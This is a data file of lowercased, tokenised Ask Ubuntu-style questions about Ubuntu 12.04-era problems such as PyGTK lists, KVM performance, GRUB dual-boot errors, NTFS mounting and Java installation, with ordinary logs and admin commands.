183848	dynamicly add or remove items from list and tree in pygtk and quickly ( glade )	i 'm trying to make some mini crm application in python using gtk ( pygtk ) , glade and started to develop it using quickly ( which is awesome ) . i 'm created some dialogs and added listview to the gui using glade ) but when i try to add some items to the list dynamically , from the script that glade\quickly created so the application will show some data to the user that called from mysql ( if there is another option ill be glad to here about.. ) it show alot of errors instead ( in the terminal ) . i looked for some tutorials but all i found is only tuts that explain how to create the list from scratch ( not using quickly , and glade ) . here is the code : this is the applicationwindow.py that created by quickly i added basic code for buttons dialogs and so ... import gettext from gettext import gettext as _ gettext.textdomain ( 'ubuntucrm ' ) from gi.repository import gtk # pylint : disable=e0611 import logging logger = logging.getlogger ( 'ubuntucrm ' ) from ubuntucrm_lib import window from ubuntucrm.aboutubuntucrmdialog import aboutubuntucrmdialog from ubuntucrm.preferencesubuntucrmdialog import preferencesubuntucrmdialog from ubuntucrm.popupcalendardialog import popupcalendardialog from ubuntucrm.newcustomerdialog import newcustomerdialog from ubuntucrm.globalsearchdialog import globalsearchdialog # see ubuntucrm_lib.window.py for more details about how this class works class ubuntucrmwindow ( window ) : __gtype_name__ = `` ubuntucrmwindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( ubuntucrmwindow , self ) .finish_initializing ( builder ) self.aboutdialog = aboutubuntucrmdialog self.preferencesdialog = preferencesubuntucrmdialog # self.popupcalendardialog = popupcalendardialog # code for other initialization actions should be added here . self.calendarbutton = self.builder.get_object ( `` calendarbutton '' ) self.contactsbutton = self.builder.get_object ( `` contactsbutton '' ) self.productsbutton = self.builder.get_object ( `` productsbutton '' ) self.otherbutton = self.builder.get_object ( `` otherbutton '' ) # dialogs self.cal = popupcalendardialog ( ) self.contactsdialog = newcustomerdialog ( ) self.globalsearcher = globalsearchdialog ( ) # lists and modelers self.lefttree = self.builder.get_object ( `` lefttreeview '' ) self.treemodeler = self.builder.get_object ( `` liststorer1 '' ) # functions def on_otherbutton_clicked ( self , widget ) : print `` you clicked otherbutton '' //here i tried somthing like : self.treemodeler.append ( [ `` bla bla '' , '' some text '' ] ) //for example , `` bla bla '' loaded from some mysql database.. def on_productsbutton_clicked ( self , widget ) : print `` you clicked producs button '' self.globalsearcher.run ( ) def on_contactsbutton_clicked ( self , widget ) : print `` you clicked contactbutton `` self.contactsdialog.run ( ) def on_calendarbutton_clicked ( self , widget ) : print `` calling to calendar button '' self.cal.run ( ) the error is : ( ubuntucrm:10443 ) : gtk-critical ** : gtk_list_store_get_value : assertion `column < priv- > n_columns ' failed and the order is incorrect |some text | bla bla | instead of : | bla bla | some text |
183858	ca n't type my username and password , random freeze at login	my netbook runs a dual os ( windows7 & ubuntu 12.04 ) . after ubuntu login screen appears , thatâs it , it gets hanged , ca n't even move my cursor nor type my user name . i had to turn off my system and boot again . still its not sure that it wo n't freeze out at login screen again , but this is the temporary solution i have to get into ubuntu . this freezing at login screen does n't happen every time , it happens randomly . it seems like i had to enter into ubuntu purely based on my luck , which is quite irritating . i found many other types of login problem in ubuntu when i googled , which were quite different from my case . so any1 kindly help me out .
183865	very slow kvm in ubuntu 12.04	i use ubuntu 12.04 64-bit and kvm , my cpu is core i5 3.3 ghz and i have 8 gb of ddr3 ram . i run windows 7 in kvm and it 's extremely slow . my co-worker use debian on the same pc configuration and can run windows 7 extremely fast ! where can be my problem ? sudo cat /etc/libvirt/qemu/windows.xml < ! -- warning : this is an auto-generated file . changes to it are likely to be overwritten and lost . changes to this xml configuration should be made using : virsh edit windows or other application using the libvirt api . -- > < domain type='kvm ' > < name > windows < /name > < uuid > 5c685175-baea-0ca6-591f-8269d923ffb8 < /uuid > < memory > 2097152 < /memory > < currentmemory > 2097152 < /currentmemory > < vcpu > 1 < /vcpu > < os > < type arch='x86_64 ' machine='pc-1.0 ' > hvm < /type > < boot dev='hd'/ > < /os > < features > < acpi/ > < apic/ > < pae/ > < /features > < clock offset='localtime'/ > < on_poweroff > destroy < /on_poweroff > < on_reboot > restart < /on_reboot > < on_crash > restart < /on_crash > < devices > < emulator > /usr/bin/kvm < /emulator > < disk type='file ' device='disk ' > < driver name='qemu ' type='raw'/ > < source file='/var/lib/libvirt/images/windows.img'/ > < target dev='hda ' bus='ide'/ > < address type='drive ' controller='0 ' bus='0 ' unit='0'/ > < /disk > < controller type='ide ' index='0 ' > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x01 ' function='0x1'/ > < /controller > < interface type='network ' > < mac address='52:54:00:94:63:91'/ > < source network='default'/ > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x03 ' function='0x0'/ > < /interface > < serial type='pty ' > < target port='0'/ > < /serial > < console type='pty ' > < target type='serial ' port='0'/ > < /console > < input type='tablet ' bus='usb'/ > < input type='mouse ' bus='ps2'/ > < graphics type='vnc ' port='-1 ' autoport='yes'/ > < sound model='ich6 ' > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x04 ' function='0x0'/ > < /sound > < video > < model type='vga ' vram='262144 ' heads='1'/ > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x02 ' function='0x0'/ > < /video > < memballoon model='virtio ' > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x05 ' function='0x0'/ > < /memballoon > < /devices > < /domain > upd : i 've enabled intel-vt before installing kvm . i 've also installed virtio drivers , so my virtual machine with windows 7 has disk like this :
183866	how do i x forward a windows application to a linux system using ssh ?	ok , so if i have two linux machines ( a and b ) and i have a program on one , and want to run it on be i do : user @ linuxa : ~ $ ssh -x linuxb user @ linuxb : ~ $ programname ( displays on linuxa machine ) ok same thing , windowsa linuxb ( program on linux ) start xming x server on windows run putty , use x11 port forward with :0.0 after connect to linuxb , run program , it loads in windows ! now here is the question , windowsa linuxb , ( program on windows ) run windows program on linux , using a windows resources . how to make it work ? btw , i know it can because years ago , i read a white paper on it , but never actually tested it out .
183867	how do i update oracle java 7 ( jdk and jre )	recently , i 've installed jdk 7 from the oracle site , using these instructions . now , i 'm wondering what is the correct method to update it ( or , better , to keep up-to-date automatically ) ? for instance , there were some security issues fixed few days ago .
183870	how can i get my hid device working in virtualbox ?	i 'm running the latest official ubuntu build of virtualbox ( 4.1.12 ) , with windows 8 running as the guest os . i have a windows app that works with a card reading hid device , but it 's not detected by the guest os at all . i 've installed the usb extensions , guest additions and set my udev rules accordingly ( my own linux app is able to access the device ) , but no joy . does anyone know how to get this working ?
183873	how to setup vpn as proxy	i have an perfectprivacy vpn connected via the openvpn-network-manger-plugin ( ubuntu 12.04.1 ) and i want to assign a system wide proxy over that vpn . i have tried proxydriver that should do that automatically , but it works partially . the browser says that i have the ip of the vpn , but when i tried to send an email over smtp ( port 25 ) , i canâ´t connect to the mail server . in our company the smtp server port is closed , but that should be not a problem , when i do that over a vpn , shouldnâ´t it ? greetings
183877	how to remove old linux kernel modules âťtp_smapiâť ?	~ $ locate tp_smapi /lib/modules/3.0.0-19-generic/updates/dkms/tp_smapi.ko /lib/modules/3.2.0-26-generic/updates/dkms/tp_smapi.ko /lib/modules/3.2.0-29-generic/updates/dkms/tp_smapi.ko /usr/src/tp-smapi-0.41/tp_smapi.c /var/lib/dkms/tp-smapi/0.41/3.0.0-19-generic/x86_64/module/tp_smapi.ko /var/lib/dkms/tp-smapi/0.41/3.2.0-26-generic/x86_64/module/tp_smapi.ko /var/lib/dkms/tp-smapi/0.41/3.2.0-29-generic/x86_64/module/tp_smapi.ko /var/lib/dkms/tp-smapi/0.41/build/tp_smapi.c' how to remove the 2 old linux kernel modules from kernels 3.0.0-19 und 3.2.0-26 ? ~ $ man dkms '' 'dkms remove [ module/module-version ] ' removes a module/version combination from a tree . ' what is a `` [ module/module-version ] '' , please ? please notice : i do not want to remove old linux kernel modules tp_smapi from a tree but i 'd like to remove old linux kernel modules from my ubuntu 12.04.1 computer .
183879	installed ubuntu on win7 but no application found ( no terminal , no browser ? )	i have installed ubuntu yesterday on my win7 laptop . everything was all right . really nice and easy installation . congratulations to all you . but i have a problem , i couldnt find any application even no terminal in the installation . and even not possible to install in system settings or software update menu . sorry for my ignorance but how can i download or install some applications ? thanks for your support . marsel
183880	bluetooth dial-up networking using blueman	i want to configure a dial up network connection via bluetooth to my phone in order to access the internet . i use lubuntu 12.04 ( ubuntu with lxde ) which has the network manager applet and blueman applet installed . i guess these are the same tools than on an ubuntu installation , hence i ask my question on this site . my phone is a sony ericsson w810i , my laptop is a lenovo s10-2 , my mobile phone provider is o2 germany . i scanned for my mobile phone using the blueman applet . i connected the dial-up network via the context menu - > serial ports - > dial-up networking . a notification bubble says that the connection is available on the interface named ppp0 . ipconfig is telling something different : there is no ppp0 or something similar . i only see my eth0 ( wired ethernet ) , eth1 ( wifi ) and lo interfaces . of course , i ca n't ping google.com as the interface really seems to be not present at all . when the dial-up network is being connected , my mobile phone says that it connects to the internet . afterwards , i see the active connection on the phone 's screen . when successfully connecting with the phone using another computer , it behaves exactly the same , so i guess that the phone is n't the problem . i do n't know if i configured the dial-up correctly . i use the phone number *99 # which is very common on most mobile isps . i use the apn which my isp is telling me to use . ( i ca n't find the number on their support page , so i just use the default value *99 # . ) my mobile isp is o2 germany . there are how-tos out there which use the network manager applet to setup a bluetooth dial-up connection , but i ca n't see any bluetooth devices in the context menu as on the screenshots in those how-tos . do you have any suggestions what might be wrong / what i should try ? edit : when choosing `` network access point '' in the device 's context menu instead of serial ports - > dial-up networking , an interface bnep0 appears . however , neither an ipv4 address is assigned for that interface ( but ipv6 ) , nor the phone connects to the internet . am i missing something ? can i connect to the internet after setting up this network connection ?
183881	cinnamon : how to change position of popup notification ?	i have an cinnamon de . after installing google+ theme , i saw , that popup notification bar moved to the top right corner . how to change position of it ?
183885	ca n't install ubuntu on hp series 2000 , blank screen	i have purchased a new laptop hp series 2000 with core i3 2nd generation processor.. however only blank screen comes during setup..i have tried with ubuntu 12.04 also..
183887	why are the colors worse on ubuntu 12.04 than on windows 7 on my sony vaio e-series ?	the colours look `` lacking '' and ever slightly blueish and rather washed-out and lacking in dimension . graphics are ok - this page for example looks fine - but if i view something like a news site with high quality photos , the experience is not optimal and is noticeably inferior to windows 7 . oddly , when i install ubuntu as a vm on virtualbox in windows , the colours look as i expect them to . it 's only on my dual-boot version of ubuntu that they look wrong ( not wubi , although a previous wubi-based installation had the same problem ) . now , i have the proprietary ati driver and i can use amdcccle to get the colours closer to what they should be , but i ca n't seem to do anything about colour depth . the depth settings in xorg are all 24 . i tried changing all three mentions of 24 to 32 but was forced into safety mode . fortunately , i remembered where i 'd been tinkering and got the file set back to 24 .
183893	wireless is disabled by hardware lenovo 3000g430	sir i have problem with my wifi switch sir please tell me solution for my problem ( wifi is disabled by hardware ) . output of sudo lshw -c network is sudo ] password for sudheer : *-network disabled description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth2 version : 01 serial : 00:21:00:72:3a:93 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 latency=0 multicast=yes wireless=ieee 802.11bg resources : irq:19 memory : f4700000-f4703fff *-network description : ethernet interface product : netlink bcm5906m fast ethernet pci express vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 02 serial : 00:1e:68 : ad:24:0b size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=full firmware=sb v3.04 ip=172.16.52.79 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:47 memory : f4600000-f460ffff output of iwconfig is lo no wireless extensions . eth2 ieee 802.11 access point : not-associated link quality:5 signal level:0 noise level:0 rx invalid nwid:0 invalid crypt:0 invalid misc:0 eth0 no wireless extensions . sudheer @ sudheer : ~ $ sudo iwlistscanning sudo : iwlistscanning : command not found ***sudheer @ sudheer : ~ $ sudo iwlist scanning*** lo interface does n't support scanning . eth2 failed to read scan data : invalid argument eth0 interface does n't support scanning .
183897	after uninstall php from ubuntu and reinstalling it . my web site stopped work .	i 'm running an ubuntu server , and i got a problem with an sap extension for php . i decided to uninstall php and reinstall it but now nothing works at all . this how i installed php : ./configure make apt-get install checkinstall checkinstall the installation works fine , but i do n't understand why nothing works anymore . thanks in advanced for your help
183898	what tool can i use to manage upstart services ?	how should i configure upstart runlevels ? of course i could edit /etc/init/xx but that was n't right way to do this , i think .
183900	how to install from ubuntu alternate cd	i want to ask is there any guide where it is written how to install ubuntu from the alternate cd . using text based installer . ?
183902	compiz in lubuntu	i have lubuntu 12.04 on my laptop . i just installed compiz and do the `` compiz -- replace '' to change it from openbox to compiz . it 's actually working but there 's no windows borders ! ! ! window decoration in enabeled but no use ... note : i did it once with mint12 lxde and the result was good . but
183904	what is the use of the various apt commands ?	can someone please explain what 's the use of these ? sudo apt-get update sudo apt-get upgrade apt-add-repository and what are the combinations to use these ?
183907	ubuntu 12.04 ( .1 ) text based live menu	i 'm showing the problem in images . what i want to access in 12.04 ( .1 ) ( i 'm using usb flash disk as the media , cd/dvd is ok ) : how it should start : how it starts now : this something is shown in the bottom left side of the monitor . there is no change if i press some keys , i ca n't access that menu . just the esc displays a dialog window , whithout any text , and two buttons . non of them displays that menu . if i press shift , it asks two questions , but non of them shows that menu . used images : ubuntu-12.04.1-desktop-i386.iso and ubuntu-12.04.1-desktop-amd64.iso ( torrent source ) - used media : usb pendrive . how can i access that menu ?
183912	daemon wo n't start up as root when clicking .deb instead of installing with dpkg	i 'm developing a debian package that should start up a backup service as the root user . all works fine when i install it from the command line e.g . sudo dpkg -i xxx.deb but when i install this by clicking the .deb file on the desktop the service wo n't start up . below is an extract from my init script : backup_user=root # # starts the attix5 daemon # do_start ( ) { start-stop-daemon -- start -- quiet -- oknodo -- chuid $ backup_user -- chdir /usr/share/a5backup \ -- pidfile $ pidfile -- startas $ sstartscript -- start } ... # perform action case `` $ 1 '' in start ) log_daemon_msg `` starting $ sname service '' if do_start ; then log_end_msg 0 else log_end_msg 1 fi ; ; is there something special i must do before the service can be started up as root when the deb file is installed via the gui .
183913	can not install jdk 7	i have already extracted the files in the tar.gz files i also tried the sudo update-alternatives but it only says it doest have too since i already have one jdk and then when i try java -version it says no such file . help me guys please how do i install oracle java jdk 7 ? this is what i followed by the way all was running well until java -version
183914	wmi windows management instrumentation on ubuntu	is there a tool for accessing windows'wmi interface ? i know once there was wmic-client ( hardy ) but it has been removed . i 'd like to administrate some windows machines remotely trough shell : i.e . remove software . at least does someone knows if there is a psexec or similar utility ? thanks
183915	nautilus left pane does not expand	i would prefer the left pane of nautilus to behave like windows file manager . it should have expandable/collapsible trees , and if i have /home/mydir-1 , /home/mydir-2 , i should be able to see them both in the left pane . when i click on one of them , the files in that dir should show in the right pane . if nautilus ca n't do it , please suggest a better file-manager which does . i would rather not open 3 panes in nautilus to do what two panes do just fine in windows file manager . secondly how can i open two instances of nautilus ? and if it is n't possible with nautilus , could it be done with some other file manager ?
183916	grub error no such partition on dual boot of windows 7 ( 32 bit ) and ubuntu 12.04 64 bit on two patritions	i have a hp compaq 8200 elite cmt pc with an i7 processor and 16gb of ram . there are two hardisks on the pc one of which is 500gb and the other one is 1tb . i have a licensed copy of windows 32 bit on the 500gb which i can not touch and i need to install a 64 bit ubuntu on the 1tb partition . the problem is when i install it normally with the grub and the ubuntu in 1tb hdd and i try to boot through it i get a grub error : no such partition . but windows does boot when i change the boot harddisk . i have tried things like boot repair , rescatux , re installing grub etc but none of them helped . i am also thinking there could be some bios issues . can anyone help fix this issue . thanks in advance
183921	can i use the gnome activities view for managing windows in unity ?	is it possible to get the gnome shell activities method for managing windows in unity ? i would like to be able to move the mouse cursor to the top left corner of the screen to show all my windows on the workspace and close windows .
183922	system log : bios may corrupt low ram , working around it	i really hope someone can assist me with a good answer . i am running ubuntu 10.04 ( not sure about kernel ) . asus motherboard 1tb hard drive 16g memory the whole computer is brand new , only like two weeks old . i am having different times computer freezes , and have the error that came from the log viewer : ami bios detected : bios may corrupt low ram , working around it . most people say that it can be that the ram is faulty , and it should be replaced . others say it is the ubuntu kernel . i am also getting answers that the bios have a bug somewhere . i would like to know - what can it be ? can this error make the computer freeze ? this is n't good ... . any help ? ?
183926	software emulated opengl with higher version than my graphics card supports	i have an intel gma 950 chipset in my netbook . i want to learn how to write opengl shader programs with this fantastic tutorial and therefore need opengl 3.3 . sadly , my graphics card only supports opengl 1.4 . i think that mesa can emulate opengl in software , so i 'm wondering if it can emulate opengl 3.3 without any hardware accelleration ( performance is not a problem , since this is only for learning and testing puroses , even excluding profiling ) . is there any possibility to do this ?
183929	can not install apt-fast	during installation of apt-fast the screen looped and after a while i closed the window . how can i fix it ? sudo dpkg -- configure -a setting up apt-fast ( 1.7.2-1~precise1 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing apt-fast ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : apt-fast
183931	installation error on maas configuration	i want to install 64 bit architecture ubuntu 12.04 lts server . i am having problem while i select option for maas server installation . when script for `` select and install package '' is running , every time it is stopped and if i skip that stage ; then grub installation is failed . so i do n't assume that it is a hardware error . i want to know whether that can be solved or not . and not any option for server installation is working on the machine . that machine is having intel xenon processor .
183932	how can i install wine without internet ?	i donât have internet , and i use internet through a usb modem device which is supported in only windows , so i tried to install wine to run that software , and i downloaded wine but it says dependency is not satisfiable : libgettextpo0 what to do ?
183933	how do i delete my commands quickly ?	i use terminal for almost all tasks . let 's say i have entered a huge command like this : sudo a-huge-command what is the easiest way to delete the whole command with a single shortcut , rather than keep on hitting backspace key ? i 'm a ubuntu newbie looking to use ubuntu in a professional way .
183938	failed to download packages while updating 12.04	i am working on 12.04 and while i am trying to install the updates , some of them were downloaded but others failed by displaying a message that said : failed to downloaded packages & check your internet connection . also when i tried to change the server to main , the following details are given to me : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_14.0+build1-0ubuntu0.12.04.1_i386.deb 404 not found [ ip : 91.189.92.184 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support_14.0+build1-0ubuntu0.12.04.1_i386.deb 404 not found [ ip : 91.189.92.184 80 ] how can i fix this problem ?
183942	new java version installation run error	i just installed a new version of java jre1.7.0_07 it is all installed and i have already set it as my default java using sudo update-alternatives -- config java however when i go to fire up a program with java i get an error java : relocation error : java : symbol jli_memalloc , version sunwprivate_1.1 not defined in file libjli.so with link time reference there is one other version of java on the system that was the default . i am completely at a loss for what to do i have researched this topic a bit but could find no resolution . any help would be greatly appreciated or at least a link to an answer .
183944	persitent key combination generation on dell vostro 3550	i have installed ubuntu 12.04 on my new dell vostro 3550 and noticed persistent windows and cursor blinking . when going to console ( ctrl+alt+f1 ) and using 'cat ' i see persistent generation of this symbols : '^ @ ' . please help ! upd : i get rid of blinking by disabling `` video bus '' ( id=8 ) device under virtual core keyboard section from xinput list command : sudo xinput set-prop 8 `` device enabled '' 0 but after return from console ( ctrl+alt+f1 then ctrl+alt+f7 ) interface is blinking again . i wonder what this device is ? and how i can disable it forever or maybe some drivers needed ?
183946	jpeg image size reduction	how can i reduce jpeg size when sending multiple images as attachments with thunderbird ?
183949	how do i make a google presentation appear on the projector display ?	when i click the start presentation button in a google presentation in google docs , the full-screen presentation appears on my laptop display instead of the display of the tv or projector i 'm connected to in a meeting room . it occasionally does appear in a window with a titlebar , and with that i would be able to drag and drop that window onto the other display , but i ca n't reproduce this behaviour on demand . it seems to be random ! i am using kde , google chrome and nvidia drivers ( nouveau does n't support my graphics chipset . ) i have a dual monitor setup with xinerama normally ( and the configuration never auto-adjusts nor can it be auto-adjusted , so that 's what i 'm using in the meeting room as well ) .
183951	weird `` tapping '' out of laptop speaker	my laptop speakers are producing a tapping sound which occurs every ~2seconds and only when there is not other audio playing . when i connect external speakers the tapping is even loder ( and still coming from internal speakers ) . i remember this was n't happening a while ago . i have made a recording of it - soundcloud stream . lshw produces this output concerning audio : *-multimedia description : audio device product : sbx00 azalia ( intel hda ) vendor : hynix semiconductor ( hyundai electronics ) physical id : 14.2 bus info : pci @ 0000:00:14.2 version : 00 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=snd_hda_intel latency=64 resources : irq:16 memory : fbaf4000-fbaf7fff what can i do to eliminate this sound ?
183953	firefox the website editor ?	there are a lot of webdeveloper addons available , for firefox , like firebug . is there a html editor addon for firefox . which i can edit my website . viewing the edits real-time ( using localhost or via ftp ? ) and saving the edits ( ctrl-s ) i am currenlty using firebug and it would save a lot of time if i could save the ( local ) .html file using a firebug like addon ! ( or firebug itself ? ) i found a firebug addon to save . css files ... now just need one to save html , and i am good to go !
183958	different behavior when launched from terminal instead of unity launcher	i have written two perl/gtk programs . when launched from the dash menu , they run just fine . however , if i try to launch them from terminal using the very same command found in their .desktop files , their unity launcher will be blurry and will remain inactive when clicked , if i keep it in the unity bar . the problem is solved if the exec part of the desktop file is replaced with perl path_to_script however , that leads to other problems , including a lintian warning and forcing all perl gui applications running from terminal to adopt the same launcher . this issue is quite annoying since one of the programs relies on a different ( python ) program in order to be launched and this results in having a blurry and inactive launcher .
183959	partititoning the hard drive after ubuntu installation	i use a dell studio 1555 laptop and i want to install ubuntu 12.04 on it . i want to know if i can create a partition on my hard disk after installing ubuntu on it . i want to create partition as we do it in windows like d : or e : drives etc .
183960	is there a ubuntu meta-package for the mono command line tools and asp.net tools ?	i 've discovered that if i install monodevelop on ubuntu , and then i decide to install something from the command line i need to add the following packages : apt-get install xbuild mono-gmcs if i need to run an asp.net project : apt-get install mono-xsp4 finally , to run unit tests from the command line i need to do the following : apt-get install nunit-console i can keep a list of all these packages and install them with one command line . however , i would expect that if they are n't installed as monodevelop dependencies , they would be included in some sort of mono-devel-cmdline package . does such a package exist ?
183962	ubuntu 12.04 lts ati / amd driver not able to install	i 'm a beginner who just set up a dual boot with win7 home and ubuntu 12.04lts . as seen in many tutorial videos and as ubuntu suggested i tried to install the proprietary drivers . my specs : dell vostro 3550 - cpu - i5 2410m @ 2.30ghz x4 - gpu - sandy bridge mobile ( + radeon hd 6630m ) - ram - 3,8gb - ubuntu 64bit 12.04lts ( win7 home prem . 64bit ) - > it detects a ati/amd driver and an additional driver update . my problem : after installing the first driver unity is not working correctly it is probably unity2d ... ca n't install the prorietary driver-addition to get it working flawless the amd catalyst control center wo n't work since it does n't detect a properly installed graphics driver so far i 've tried to install solely the first proprietary driver however the catalyst control center would n't work the update for the proprietary driver but somehow failed and after a reboot it showed me none of both drivers is running ( no green point ) . i 've tried the driver from amd 's website ( http : //support.amd.com/de/gpudownload/linux/pages/radeon_linux.aspx | http : //support.amd.com/us/gpudownload/linux/pages/radeon_linux.aspx ) ... after all i could n't manage to get any driver working help please ... it 's much appreciated because at the moment the graphics card seems to be running all the time consuming much energy update1 : 2012-10-03 19:24:57,214 warning : /sys/module/fglrx_updates/drivers does not exist , can not rebind fglrx_updates driver 2012-10-03 19:25:14,448 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 19:25:14,448 debug : fglrx_updates is not the alternative in use 2012-10-03 19:25:14,480 debug : fglrx.enabled ( fglrx_updates ) : target_alt none current_alt /usr/lib/fglrx/ld.so.conf other target alt none other current alt /usr/lib/fglrx/alt_ld.so.conf 2012-10-03 19:25:14,480 debug : fglrx_updates is not the alternative in use getting this jockey.log once i try to install the additional driver ! tried to install the additional driver because unity2d ( the message confirmed my estimation ) crashed due to some driver thing afaik commencing to lose confidence this post will help me and my problem will be fixed - : ( update2 : another try to install the above mentioned drivers from amd 's website led the system to boot into low graphics mode . i could remove it because the catch still included these commands to remove the drivers http : //wiki.cchtml.com/index.php/ubuntu_natty_installation_guide # removing_catalyst.2ffglrx
183963	will ubuntu work on asus x54hr-sx073v	i bought an asus x54hr-sx073v laptop , and i was thinking about getting ubuntu as the os for it . does anyone know will it work or not , and are there any compability problems with it ?
183970	mount exited with exit code 13	i have a 1tb external hard drive that i recently formatted to ntfs . it was mounting on my ubuntu 11.10 fine until just now . i did n't make any changes to affect my os or my exhdd . the error that i get is : error mounting : mount exited with exit code 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb2 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . i did read this and this . but neither helped . i tried installing ntfsfix but no such package exists anymore . i have never used this hdd on a windows machine . if i need to use an other machine to do stuff to fix this , i have access to a mac . any advice ? this is my sudo fdisk -l output : what in the world is gpt ? i did n't do that . it used to be ntfs . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000586fb device boot start end blocks id system /dev/sda1 * 2148 961320312 480659082+ 83 linux /dev/sda2 961320313 976773167 7726427+ 5 extended /dev/sda5 961320314 976773167 7726427 83 linux warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xcfd88605 device boot start end blocks id system /dev/sdb1 1 1953525167 976762583+ ee gpt
183973	errors when opening microsoft office	the installation process was successful but i get error messages when opening any application . the instructions i followed were from here . how do i go about it ? i am using ubuntu 10.04 . the error message i get is unhandled exception : assertion failed in 32-bit code ( 0x6b02b832 ) . register dump : cs:0073 ss:007b ds:007b es:007b fs:0033 gs:003b eip:6b02b832 esp:0033e6e4 ebp:0033e6f0 eflags:00200202 ( - -- i - - - ) eax:00000000 ebx:00000f0b ecx:00000f0b edx:00000006 esi:6828ba9e edi:682aeff4 stack dump : 0x0033e6e4 : 68184651 682aeff4 0033e810 0033e818 0x0033e6f4 : 68187a82 00000006 0033e790 00000000 0x0033e704 : 0001ee00 682b0450 00000090 682b03c0 0x0033e714 : 682aeff4 682b03c0 0000008a 0033e738 0x0033e724 : 681c9a9d 0033e800 682aeff4 682aeff4 0x0033e734 : 0000008b 0033e800 681b9da8 7db7b0d8 backtrace : = > 0 0x6b02b832 glibc_2+0x832 ( ) in ld-linux.so.2 ( 0x0033e6f0 ) 1 0x68187a82 abort+0x181 ( ) in libc.so.6 ( 0x0033e818 ) 2 0x6817d718 __assert_fail+0xf7 ( ) in libc.so.6 ( 0x0033e860 ) 3 0x712fec66 in riched20 ( +0xec65 ) ( 0x0033e930 ) 4 0x71310688 in riched20 ( +0x20687 ) ( 0x0033e9e0 ) 5 0x7130bee1 in riched20 ( +0x1bee0 ) ( 0x0033eaa0 ) 6 0x7130c21c in riched20 ( +0x1c21b ) ( 0x0033ead0 ) 7 0x6d3b9a9a winproc_wrapper+0x19 ( ) in user32 ( 0x0033eb00 )
183975	how can i use gprename 's regex feature to reinsert the matched-group into the 'replace ' ?	i 've been using gprename to batch-rename files ; this is rather more efficient than individually correcting each file , but still seems to be less efficient than it might be , primarily because either i do n't understand the regex syntax used , or because the regex implementation is incomplete1 given a list of files of the following syntax : ( 01 ) - title of file1.avi ( 02 ) - title of file2.avi ( 03 ) - title of file3.avi i attempted to use the 'replace ' ( with the regex option selected , the case-sensitive option deselected ) : ( \ ( \d { 2 } \ ) ) the preview then shows ( given that i 've specified no 'replace with ' option as yet ) : title of file1.avi title of file2.avi title of file3.avi which is great , clearly the regex is identifying the correct group ( the ( 01 ) ) . now , what i was hoping to do ( using the javascript syntax ) in the 'replace with ' option is use : $ 1 ( i also tried using ' $ 1 ' , \1 and '\1 ' ) this was just to check that i could access the matched group , and it seems i ca n't , the matched group is , as i suppose might be expected , replaced with the literal replacement string . so , my question : is it possible to match a particular group of characters , in this case the numbers within the brackets , and then insert those into the replacement string ? therefore : ( 01 ) title of file1.avi ( 02 ) title of file2.avi ( 03 ) title of file3.avi becomes : 01 title of file1.avi 02 title of file2.avi 03 title of file3.avi i absolutely suspect the former , personally .
183978	how to install all versions ( stable/beta/unstable ) of google chrome side by side without conflicts ?	i have the stable version of google chrome on my box . and each time i 'm trying to install beta or/and unstable versions then i run into the same problem : the following packages will be removed google-chrome-stable the following new packages will be installed google-chrome-beta 0 upgraded , 1 newly installed , 1 to remove and 0 not upgraded . need to get 34.5 mb of archives . after this operation , 3,109 kb of additional disk space will be used . do you want to continue [ y/n ] ? i need to remove the first version before installing another . i know i ca n't install existing packages side by side but i 'm looking for solution not for answer like : `` you ca n't do it '' , i already know i can not . so in summary my question is : how can i install all google chrome versions next to each other ? ( there needs to be a way.. )
